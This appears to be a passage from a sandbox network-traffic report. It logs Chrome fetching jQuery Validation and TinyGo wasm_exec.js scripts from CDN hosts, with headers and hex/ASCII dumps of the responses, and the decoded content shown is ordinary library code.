                                                                                                                                                          2024-06-09 22:41:10 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:10 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:10 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          2024-06-09 22:41:10 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:10 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:10 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:10 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 35 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 5
                                                                                                                                                          2024-06-09 22:41:10 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:10 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:10 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          326192.168.2.550086183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC585OUTGET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC707INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 27823
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-210-24
                                                                                                                                                          ETag: "655579ca-6caf"
                                                                                                                                                          Date: Thu, 06 Jun 2024 10:05:53 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 10:05:53 GMT
                                                                                                                                                          Age: 304516
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp210:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-210-24
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-07
                                                                                                                                                          X-Cdn-Request-ID: a806f111ceab5edda011d44559373a1e
                                                                                                                                                          2024-06-09 22:41:10 UTC15677INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 56 61 6c 69 64 61 74 69 6f 6e 20 50 6c 75 67 69 6e 20 76 31 2e 31 33 2e 31 0a 20 2a 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 76 61 6c 69 64 61 74 69 6f 6e 2e 6f 72 67 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 4a c3 b6 72 6e 20 5a 61 65 66 66 65 72 65 72 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 66 61 63 74 6f 72 79 29 7b 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 61 63 74 6f 72 79 29 7d 65 6c 73 65 7b 66 61 63 74 6f 72 79
                                                                                                                                                          Data Ascii: /*! * jQuery Validation Plugin v1.13.1 * * http://jqueryvalidation.org/ * * Copyright (c) 2014 Jrn Zaefferer * Released under the MIT license */(function(factory){if(typeof define==="function"&&define.amd){define(["jquery"],factory)}else{factory
                                                                                                                                                          2024-06-09 22:41:10 UTC12146INData Raw: 72 6f 72 2e 61 74 74 72 28 22 66 6f 72 22 2c 65 6c 65 6d 65 6e 74 49 44 29 7d 65 6c 73 65 7b 69 66 28 65 72 72 6f 72 2e 70 61 72 65 6e 74 73 28 22 6c 61 62 65 6c 5b 66 6f 72 3d 27 22 2b 65 6c 65 6d 65 6e 74 49 44 2b 22 27 5d 22 29 2e 6c 65 6e 67 74 68 3d 3d 3d 30 29 7b 65 72 72 6f 72 49 44 3d 65 72 72 6f 72 2e 61 74 74 72 28 22 69 64 22 29 2e 72 65 70 6c 61 63 65 28 2f 28 3a 7c 5c 2e 7c 5c 5b 7c 5c 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 3b 69 66 28 21 64 65 73 63 72 69 62 65 64 42 79 29 7b 64 65 73 63 72 69 62 65 64 42 79 3d 65 72 72 6f 72 49 44 7d 65 6c 73 65 7b 69 66 28 21 64 65 73 63 72 69 62 65 64 42 79 2e 6d 61 74 63 68 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 62 22 2b 65 72 72 6f 72 49 44 2b 22 5c 5c 62 22 29 29 29 7b 64 65 73 63 72 69 62 65 64 42
                                                                                                                                                          Data Ascii: ror.attr("for",elementID)}else{if(error.parents("label[for='"+elementID+"']").length===0){errorID=error.attr("id").replace(/(:|\.|\[|\])/g,"\\$1");if(!describedBy){describedBy=errorID}else{if(!describedBy.match(new RegExp("\\b"+errorID+"\\b"))){describedB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          327192.168.2.550088183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC583OUTGET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC715INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 4126
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-03
                                                                                                                                                          ETag: W/"655579ca-3a09"
                                                                                                                                                          Date: Sat, 08 Jun 2024 01:32:41 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 01:32:41 GMT
                                                                                                                                                          Age: 162508
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-09-03
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-28
                                                                                                                                                          X-Cdn-Request-ID: feb8b63d82d03d1c60abaa8e4ab64a05
                                                                                                                                                          2024-06-09 22:41:10 UTC4126INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1b ed 72 db 36 f2 55 6c 8e 2b 93 15 45 4b 76 d3 26 96 69 4f ea 38 4d 66 e2 f4 f3 7a 3f 24 a5 43 49 90 c4 86 22 15 92 72 e2 93 f8 22 f7 2c f7 4e f7 0a b7 1f 00 08 52 92 5d a7 be e9 fd 38 4f 1b 93 8b dd c5 62 bf 01 c2 f6 64 19 8f f2 30 89 ed 49 30 ca 93 f4 d6 59 85 13 3b bf 5d 88 64 b2 37 16 93 30 16 be ef 5b 0a cb 6a 34 18 e8 05 f3 b1 b3 e2 67 bb 67 fd fe 61 29 d2 5b cb 85 87 5f 83 28 1c 07 b9 b0 06 ae 62 59 88 28 13 2b f9 66 ff fe 23 e2 3a 45 61 eb b9 0f 9c 95 7a 86 49 a3 e7 51 f4 3a 1e 8b 4f 22 b3 e3 60 2e 9c 55 2a f2 65 1a ef e1 8b 97 8a 45 14 8c 84 7d d4 ef f5 c7 cd fe e0 68 ea 5a bd 81 e5 14 07 de 0d 4f 9d a4 5e 26 f2 17 62 12 2c a3 3c b3 57 22 4d 93 f4 32 0a b2 ec d4 9a 05 59 8b de 3b 96 fb 5e dc 2e 52 91 65 2f 44 14
                                                                                                                                                          Data Ascii: r6Ul+EKv&iO8Mfz?$CI"r",NR]8Obd0I0Y;]d70[j4gga)[_(bY(+f#:EazIQ:O"`.U*eE}hZO^&b,<W"M2Y;^.Re/D


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          328192.168.2.550101188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC525OUTGET /wasm_exec.js HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC860INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=14400, must-revalidate
                                                                                                                                                          ETag: W/"cb86ea27dd7c6c898f98d617d86fb707"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGOx5SWCPNPx5Hr8zkvQCQE%2BGVKCALe7S3kwKNYUbcGCt1utclKA5dEBDjEfFH%2FXF05pz%2FABOUszeu4%2BPaPVWRDhHx3RxaQWnGjKy%2B%2Bdsp9GEkba2n81jXf%2FQdg4NGM%2FmmqUvbJ8ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 438
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0a47dfa4779-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:09 UTC509INData Raw: 33 66 36 34 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 54 68 65 20 47 6f 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2f 2f 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 0a 2f 2f 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 0a 2f 2f 0a 2f 2f 20 54 68 69 73 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 66 6f 72 20 75 73 65 20 62 79 20 74 68 65 20 54 69 6e 79 47 6f 20 63 6f 6d 70 69 6c 65 72 2e 0a 0a 28 28 29 20 3d 3e 20 7b 0a 09 2f 2f 20 4d 61 70 20 6d 75 6c 74 69 70
                                                                                                                                                          Data Ascii: 3f64// Copyright 2018 The Go Authors. All rights reserved.// Use of this source code is governed by a BSD-style// license that can be found in the LICENSE file.//// This file has been modified for use by the TinyGo compiler.(() => {// Map multip
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 77 69 6e 64 6f 77 2e 67 6c 6f 62 61 6c 20 3d 20 77 69 6e 64 6f 77 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 73 65 6c 66 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 73 65 6c 66 2e 67 6c 6f 62 61 6c 20 3d 20 73 65 6c 66 3b 0a 09 7d 20 65 6c 73 65 20 7b 0a 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 65 78 70 6f 72 74 20 47 6f 20 28 6e 65 69 74 68 65 72 20 67 6c 6f 62 61 6c 2c 20 77 69 6e 64 6f 77 20 6e 6f 72 20 73 65 6c 66 20 69 73 20 64 65 66 69 6e 65 64 29 22 29 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 72 65 71 75 69 72 65 20
                                                                                                                                                          Data Ascii: } else if (typeof window !== "undefined") {window.global = window;} else if (typeof self !== "undefined") {self.global = self;} else {throw new Error("cannot export Go (neither global, window nor self is defined)");}if (!global.require
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 2c 0a 09 09 09 66 63 68 6f 77 6e 28 66 64 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 74 61 74 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 79 6e 63 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 6e 75 6c 6c 29 3b 20 7d 2c 0a 09 09 09 66 74 72 75 6e 63 61 74 65 28 66 64 2c 20 6c 65 6e 67 74 68 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 6c 63 68 6f 77 6e 28 70 61 74 68 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c
                                                                                                                                                          Data Ascii: ,fchown(fd, uid, gid, callback) { callback(enosys()); },fstat(fd, callback) { callback(enosys()); },fsync(fd, callback) { callback(null); },ftruncate(fd, length, callback) { callback(enosys()); },lchown(path, uid, gid, callback) { call
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 69 72 28 29 20 7b 20 74 68 72 6f 77 20 65 6e 6f 73 79 73 28 29 3b 20 7d 2c 0a 09 09 7d 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 20 7b 0a 09 09 63 6f 6e 73 74 20 6e 6f 64 65 43 72 79 70 74 6f 20 3d 20 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 3b 0a 09 09 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 20 3d 20 7b 0a 09 09 09 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 62 29 20 7b 0a 09 09 09 09 6e 6f 64 65 43 72 79 70 74 6f 2e 72 61 6e 64 6f 6d 46 69 6c 6c 53 79 6e 63 28 62 29 3b 0a 09 09 09 7d 2c 0a 09 09 7d 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 20 7b 0a 09 09 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3d 20 7b 0a 09 09 09 6e 6f 77 28 29 20 7b 0a 09
                                                                                                                                                          Data Ascii: ir() { throw enosys(); },}}if (!global.crypto) {const nodeCrypto = require("crypto");global.crypto = {getRandomValues(b) {nodeCrypto.randomFillSync(b);},};}if (!global.performance) {global.performance = {now() {
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 09 09 69 66 20 28 21 69 73 4e 61 4e 28 66 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 66 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 73 74 6f 72 65 56 61 6c 75 65 20 3d 20 28 61 64 64 72 2c 20 76 29 20 3d 3e 20 7b 0a 09 09 09 09 63 6f 6e 73 74 20 6e 61 6e 48 65 61 64 20 3d 20 30 78 37 46 46 38 30 30 30 30 3b 0a 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 76 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 0a 09 09 09 09 09 69 66 20 28 69 73 4e 61 4e 28 76 29 29 20 7b 0a 09 09 09 09 09 09 6d 65 6d 28 29
                                                                                                                                                          Data Ascii: if (!isNaN(f)) {return f;}const id = mem().getUint32(addr, true);return this._values[id];}const storeValue = (addr, v) => {const nanHead = 0x7FF80000;if (typeof v === "number") {if (isNaN(v)) {mem()
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 20 22 73 79 6d 62 6f 6c 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 33 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 34 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 20 2b 20 34 2c 20 6e 61 6e 48 65 61 64 20 7c 20 74 79 70 65 46 6c 61 67 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 69 64 2c 20 74 72 75 65 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 6c 6f 61 64 53 6c 69 63 65 20 3d 20 28 61 72 72 61 79 2c 20 6c 65 6e 2c 20 63 61 70 29 20 3d 3e 20 7b 0a 09 09 09 09 72 65
                                                                                                                                                          Data Ascii: "symbol":typeFlag = 3;break;case "function":typeFlag = 4;break;}mem().setUint32(addr + 4, nanHead | typeFlag, true);mem().setUint32(addr, id, true);}const loadSlice = (array, len, cap) => {re
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 69 74 65 20 6c 69 6e 65 0a 09 09 09 09 09 09 09 09 09 09 6c 65 74 20 6c 69 6e 65 20 3d 20 64 65 63 6f 64 65 72 2e 64 65 63 6f 64 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 6f 67 4c 69 6e 65 29 29 3b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 20 3d 20 5b 5d 3b 0a 09 09 09 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6c 69 6e 65 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 2e 70 75 73 68 28 63 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 69 6e 76 61 6c 69 64 20 66 69 6c 65 20 64 65 73 63 72 69
                                                                                                                                                          Data Ascii: ite linelet line = decoder.decode(new Uint8Array(logLine));logLine = [];console.log(line);} else {logLine.push(c);}}}} else {console.error('invalid file descri
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 76 5f 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 2d 2d 3b 0a 09 09 09 09 09 09 69 66 20 28 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 20 3d 3d 3d 20 30 29 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 74 20 76 20 3d 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 73 2e 64 65 6c 65 74 65 28 76 29 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 50 6f 6f 6c 2e 70 75 73 68 28 69 64 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a
                                                                                                                                                          Data Ascii: const id = mem().getUint32(v_addr, true);this._goRefCounts[id]--;if (this._goRefCounts[id] === 0) {const v = this._values[id];this._values[id] = null;this._ids.delete(v);this._idPool.push(id);}},
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 76 61 6c 75 65 53 65 74 49 6e 64 65 78 28 76 20 72 65 66 2c 20 69 20 69 6e 74 2c 20 78 20 72 65 66 29 0a 09 09 09 09 09 22 73 79 73 63 61 6c 6c 2f 6a 73 2e 76 61 6c 75 65 53 65 74 49 6e 64 65 78 22 3a 20 28 76 5f 61 64 64 72 2c 20 69 2c 20 78 5f 61 64 64 72 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 52 65 66 6c 65 63 74 2e 73 65 74 28 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 2c 20 69 2c 20 6c 6f 61 64 56 61 6c 75 65 28 78 5f 61 64 64 72 29 29 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 66 75 6e 63 20 76 61 6c 75 65 43 61 6c 6c 28 76 20 72 65 66 2c 20 6d 20 73 74 72 69 6e 67 2c 20 61 72 67 73 20 5b 5d 72 65 66 29 20 28 72 65 66 2c 20 62 6f 6f 6c 29 0a 09 09 09 09 09 22 73 79 73 63
                                                                                                                                                          Data Ascii: ;},// valueSetIndex(v ref, i int, x ref)"syscall/js.valueSetIndex": (v_addr, i, x_addr) => {Reflect.set(loadValue(v_addr), i, loadValue(x_addr));},// func valueCall(v ref, m string, args []ref) (ref, bool)"sysc
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 73 74 20 76 20 3d 20 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 3b 0a 09 09 09 09 09 09 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 6c 6f 61 64 53 6c 69 63 65 4f 66 56 61 6c 75 65 73 28 61 72 67 73 5f 70 74 72 2c 20 61 72 67 73 5f 6c 65 6e 2c 20 61 72 67 73 5f 63 61 70 29 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 76 2c 20 61 72 67 73 29 29 3b 0a 09 09 09 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 38 28 72 65 74 5f 61 64 64 72 20 2b 20 38 2c 20 31 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 65 72
                                                                                                                                                          Data Ascii: st v = loadValue(v_addr);const args = loadSliceOfValues(args_ptr, args_len, args_cap);try {storeValue(ret_addr, Reflect.construct(v, args));mem().setUint8(ret_addr + 8, 1);} catch (err) {storeValue(ret_addr, er


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
